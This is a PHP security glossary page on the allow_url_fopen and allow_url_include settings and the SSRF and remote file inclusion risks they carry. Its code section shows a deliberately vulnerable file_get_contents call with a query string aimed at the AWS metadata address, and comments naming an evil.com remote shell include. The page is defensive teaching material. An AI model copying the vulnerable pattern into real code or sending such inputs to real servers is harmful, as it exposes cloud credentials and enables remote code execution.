CodeClarityLab / Glossary
Ctrl K
← Home ← Codex ← DEBT
Browse by Category
+ added · updated 7d
Pages
Terms of Use About Contribute 🧠Logic graph Contact
← Back to glossary

allow_url_fopen / allow_url_include

PHP CWE-98 OWASP A5:2021 CVSS 9.8 PHP 5.0+ Intermediate
debt(d5/e3/b3/t6)
d5 Detectability Operational debt — how invisible misuse is to your safety net

Closest to 'specialist tool catches it' (d5). The detection_hints list semgrep and lynis as tools that can flag allow_url_fopen=On in config or usage of file_get_contents with URLs. These are specialist security scanning tools, not default linters. A default PHP linter won't flag this — you need SAST or a hardening auditor to catch it systematically.

e3 Effort Remediation debt — work required to fix once spotted

Closest to 'simple parameterised fix' (e3). The quick_fix is to set allow_url_fopen=Off in php.ini and replace file_get_contents() URL calls with cURL. The ini change is one line, but replacing file_get_contents URL usages across a codebase requires a small but systematic refactor — swapping each call to use cURL or an HTTP client. This is more than e1 but stays within a single concern/component pattern, so e3 fits.

b3 Burden Structural debt — long-term weight of choosing wrong

Closest to 'localised tax' (b3). This is a php.ini configuration setting that affects file-wrapper-based URL functions. It's not load-bearing across the architecture — it's a localized configuration concern. However, it applies to both web and CLI contexts and legacy code may have scattered file_get_contents URL calls that implicitly depend on it being On, creating a mild ongoing tax. Still, it doesn't shape the system's architecture, so b3 is appropriate.

t6 Trap Cognitive debt — how counter-intuitive correct behaviour is

Closest to 'notable trap' (t5), +1 to t6. The misconception is significant: developers commonly believe disabling allow_url_fopen prevents all remote HTTP requests from PHP, when it only affects URL-aware file functions and leaves cURL completely unaffected. Additionally, common_mistakes reveal that developers don't realize allow_url_fopen interacts with allow_url_include to affect include/require statements — a compounding surprise. This goes beyond a single documented gotcha (t5) but doesn't quite reach 'contradicts how a similar concept works elsewhere' (t7), so t6 is warranted.

About DEBT scoring → scored by claude-opus-4-6 · 2026-05-06 · reviewed by human

Also Known As

allow_url_fopen setting remote file open URL file wrapper

TL;DR

PHP INI settings that permit file functions and include/require to load remote URLs — a major SSRF and RFI enabler.

Explanation

allow_url_fopen permits file_get_contents(), fopen(), and similar functions to fetch remote HTTP/FTP URLs. allow_url_include goes further, enabling include() and require() to load remote scripts — enabling Remote File Inclusion (RFI) attacks where an attacker includes and executes a PHP file from an attacker-controlled server. Both settings should be disabled in production (allow_url_fopen = Off, allow_url_include = Off) unless remote fetching is explicitly required, in which case use cURL with strict URL validation instead.

Common Misconception

Disabling allow_url_fopen prevents all remote HTTP requests from PHP. It only affects URL-aware file functions like file_get_contents() with a URL — cURL is completely unaffected and can still make outbound requests regardless of this setting.

Why It Matters

allow_url_fopen enables PHP's file functions to fetch remote URLs — combined with user-controlled paths, it enables SSRF and remote file inclusion vulnerabilities.

Common Mistakes

  • Leaving allow_url_fopen enabled in production when it is only needed in specific scripts.
  • Using file_get_contents($userInput) where user input can be a URL — SSRF via allow_url_fopen.
  • Not realising that allow_url_fopen affects include/require when allow_url_include is also enabled.
  • Believing that allow_url_fopen is safe because you only call it with known paths — input sanitisation can be bypassed.

Avoid When

  • Any production web application — allow_url_fopen enables remote file inclusion vulnerabilities if user input reaches file functions.
  • When Guzzle, cURL, or any HTTP client library is available — use them instead for explicit, safe HTTP calls.
  • Shared hosting environments where you cannot control what other tenants do with the setting.

When To Use

  • Strictly controlled CLI scripts on trusted infrastructure where input is never user-supplied.
  • Legacy code that cannot yet be refactored — disable it in php.ini and enable only where truly required.
  • Never use with user-supplied file paths — always use explicit HTTP client libraries for remote requests.

Code Examples

✗ Vulnerable 
// allow_url_fopen=On in php.ini enables this SSRF:
$content = file_get_contents($_GET['source']);
// ?source=http://169.254.169.254/latest/meta-data/ — AWS metadata
✓ Fixed 
; php.ini
allow_url_fopen   = Off  ; prevents file_get_contents('http://evil.com/shell.php')
allow_url_include = Off  ; prevents include('http://evil.com/shell.php') — critical

// For HTTP requests, use GuzzleHTTP — explicit, configurable, auditable:
use GuzzleHttp\Client;
$client   = new Client(['timeout' => 5, 'verify' => true]);
$response = $client->get('https://api.example.com/data');
$body     = (string) $response->getBody();
Added 15 Mar 2026
Edited 25 Mar 2026
Views 177

Curated in Warsaw under one editorial standard. 1,506 terms, single voice.  About this reference →

Rate this term
No ratings yet
🤖 AI Guestbook educational data only
| |
Last 30 days
0 pings T 1 ping W 2 pings T 0 pings F 0 pings S 0 pings S 0 pings M 0 pings T 0 pings W 1 ping T 0 pings F 0 pings S 3 pings S 3 pings M 1 ping T 2 pings W 1 ping T 1 ping F 0 pings S 2 pings S 0 pings M 0 pings T 1 ping W 2 pings T 5 pings F 9 pings S 0 pings S 2 pings M 0 pings T 0 pings W
Agents 0
No pings yet today
No pings yesterday
ChatGPT 78 Perplexity 18 Amazonbot 16 Scrapy 9 Ahrefs 6 Google 5 SEMrush 5 Unknown AI 4 Claude 2 Meta AI 2 Majestic 1 Bing 1
Also referenced
php.ini Security Settings 85 Local File Inclusion (LFI) 67 Server-Side Request Forgery (SSRF) 63 include vs require vs *_once 53
How they use it
crawler 136 crawler_json 3 pre-tracking 8
Related categories
php 13k security 7.8k
DEV INTEL Tools & Severity
🟠 High ⚙ Fix effort: Low
⚡ Quick Fix
Set allow_url_fopen=Off in production php.ini — use cURL explicitly instead, which gives you full control over timeouts, TLS verification, and redirect following
📦 Applies To
PHP 5.0+ web cli
🔗 Prerequisites
🔍 Detection Hints
allow_url_fopen=On in production; file_get_contents('http://...') for external requests; no timeout on URL fetch via file wrappers
Auto-detectable: ✓ Yes semgrep lynis
⚠ Related Problems
🤖 AI Agent
Confidence: High False Positives: Low ✓ Auto-fixable Fix: Low Context: Line
CWE-441 CWE-918
✓ schema.org compliant